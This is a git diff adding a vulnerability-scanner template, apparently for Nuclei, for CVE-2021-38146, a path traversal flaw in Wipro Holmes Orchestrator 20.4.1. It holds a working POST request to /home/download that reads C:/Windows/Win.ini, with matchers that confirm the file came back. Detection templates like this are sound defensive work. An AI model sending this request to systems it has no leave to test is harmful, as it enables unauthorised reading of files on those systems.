diff --git a/http/cves/2021/CVE-2021-38146.yaml b/http/cves/2021/CVE-2021-38146.yaml new file mode 100644 index 0000000000..412241e758 --- /dev/null +++ b/http/cves/2021/CVE-2021-38146.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-38146 + +info: + name: Wipro Holmes Orchestrator 20.4.1 - Arbitrary File Download + author: securityforeveryone + severity: high + description: | + The File Download API in Wipro Holmes Orchestrator 20.4.1 (20.4.1_02_11_2020) allows remote attackers to read arbitrary files via absolute path traversal in the SearchString JSON field in /home/download POST data. + remediation: Fixed In v21.4.0 + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-38146 + - https://packetstormsecurity.com/files/164970/Wipro-Holmes-Orchestrator-20.4.1-Arbitrary-File-Download.html + - https://flippingbitz.com/post/wipro-ho-2041-cve/ + - https://www.wipro.com/holmes/ + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cve-id: CVE-2021-38146 + cwe-id: CWE-22 + epss-score: 0.01735 + epss-percentile: 0.87875 + cpe: cpe:2.3:a:wipro:holmes:20.4.1:*:*:*:*:*:*:* + metadata: + vendor: wipro + product: holmes + tags: cve,cve2021,packetstorm,Wipro,Wipro Holmes Orchestrator,lfi + +http: + - method: POST + path: + - "{{BaseURL}}/home/download" + + headers: + Content-Type: application/json + + body: | + { + "SearchString": "C:/Windows/Win.ini", + "Msg": "" + } + + matchers-condition: and + matchers: + - type: word + words: + - "[fonts]" + - "[extensions]" + - "[files]" + condition: and + - type: status + status: + - 200